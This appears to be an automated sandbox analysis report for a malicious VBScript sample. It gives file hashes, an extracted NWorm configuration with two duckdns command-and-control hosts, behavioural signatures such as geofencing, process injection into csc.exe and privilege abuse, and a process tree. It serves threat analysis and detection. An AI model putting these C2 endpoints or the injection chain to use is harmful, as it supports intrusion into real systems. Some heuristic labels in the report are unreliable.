Analysis
- max time kernel: 138s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 11-02-2022 18:09
Static task: static1
Behavioral task: behavioral1
- Sample: CQNUQGCNZ.vbs
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: CQNUQGCNZ.vbs
- Resource: win10v2004-en-20220113
General
- Target: CQNUQGCNZ.vbs
- Size: 10KB
- MD5: 6612508aa88431555344552cb01f160e
- SHA1: 27996b57e0e6f57c28c99f6f6689683d4baca2d5
- SHA256: cccccb888c81985ab515e56c035ae0e5708b88d8a8ef3b08a1a9d990fbbe83cd
- SHA512: 90c375626a3aeaf61b9aa77f1019c29e0215bbeb1e22f1cb22f8c4d55733177c0af674999e3829e9b838ee5b2b589259b479bfcf2855f6089afd8ae796a5f12c
Malware Config
Extracted:
- nworm v0.3.8
- nyanmoj.duckdns.org:5057
- moneyhope81.duckdns.org:5057
- cb2d3cba
Signatures

NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
Blocklisted process makes network request (2 IoCs)
Processes (flow | pid | process):
  6 | 4128 | powershell.exe
  32 | 4128 | powershell.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | WScript.exe
Suspicious use of SetThreadContext (1 IoCs)
Processes (description | pid | process | target process):
  PID 4128 set thread context of 1288 | 4128 | powershell.exe | csc.exe
Drops file in Windows directory (8 IoCs)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe
  File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | svchost.exe
  File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | svchost.exe
  File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | svchost.exe
  File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | svchost.exe
  File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe
  File opened for modification | C:\Windows\WinSxS\pending.xml | TiWorker.exe
  File opened for modification | C:\Windows\WindowsUpdate.log | svchost.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes (pid | process):
  4128 | powershell.exe
  4128 | powershell.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (description | pid | process), identical rows collapsed with their count:
  Token: SeDebugPrivilege | 4128 | powershell.exe
  Token: SeShutdownPrivilege (x3) | 396 | svchost.exe
  Token: SeCreatePagefilePrivilege (x3) | 396 | svchost.exe
  Token: SeSecurityPrivilege (x19) | 1072 | TiWorker.exe
  Token: SeRestorePrivilege (x19) | 1072 | TiWorker.exe
  Token: SeBackupPrivilege (x19) | 1072 | TiWorker.exe
Suspicious use of WriteProcessMemory (10 IoCs)
Processes (description | pid | process | target process):
  PID 4852 wrote to memory of 4128 | 4852 | WScript.exe | powershell.exe
  PID 4852 wrote to memory of 4128 | 4852 | WScript.exe | powershell.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
  PID 4128 wrote to memory of 1288 | 4128 | powershell.exe | csc.exe
Processes (tree level in brackets)
- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CQNUQGCNZ.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: obfuscated PowerShell one-liner (string-replacement obfuscation, executed via IEX)
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  Command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
Downloads (memory dumps, with filesize)
- memory/396-135-0x000001DD19980000-0x000001DD19990000-memory.dmp (64KB)
- memory/396-137-0x000001DD1CD60000-0x000001DD1CD64000-memory.dmp (16KB)
- memory/396-136-0x000001DD1A160000-0x000001DD1A170000-memory.dmp (64KB)
- memory/1288-139-0x0000000000400000-0x000000000040A000-memory.dmp (40KB)
- memory/1288-140-0x0000000074ECE000-0x0000000074ECF000-memory.dmp (4KB)
- memory/1288-141-0x0000000002FD0000-0x0000000002FD1000-memory.dmp (4KB)
- memory/1288-142-0x00000000030D0000-0x000000000316C000-memory.dmp (624KB)
- memory/1288-143-0x0000000006110000-0x00000000066B4000-memory.dmp (5.6MB)
- memory/1288-144-0x0000000003170000-0x00000000031D6000-memory.dmp (408KB)
- memory/4128-134-0x00000248FEE46000-0x00000248FEE48000-memory.dmp (8KB)
- memory/4128-133-0x00000248FEE43000-0x00000248FEE45000-memory.dmp (8KB)
- memory/4128-131-0x00007FFB2BB13000-0x00007FFB2BB15000-memory.dmp (8KB)
- memory/4128-132-0x00000248FEE40000-0x00000248FEE42000-memory.dmp (8KB)
- memory/4128-138-0x00000248FFDB0000-0x00000248FFDCA000-memory.dmp (104KB)
- memory/4128-130-0x00000248FEF50000-0x00000248FEF72000-memory.dmp (136KB)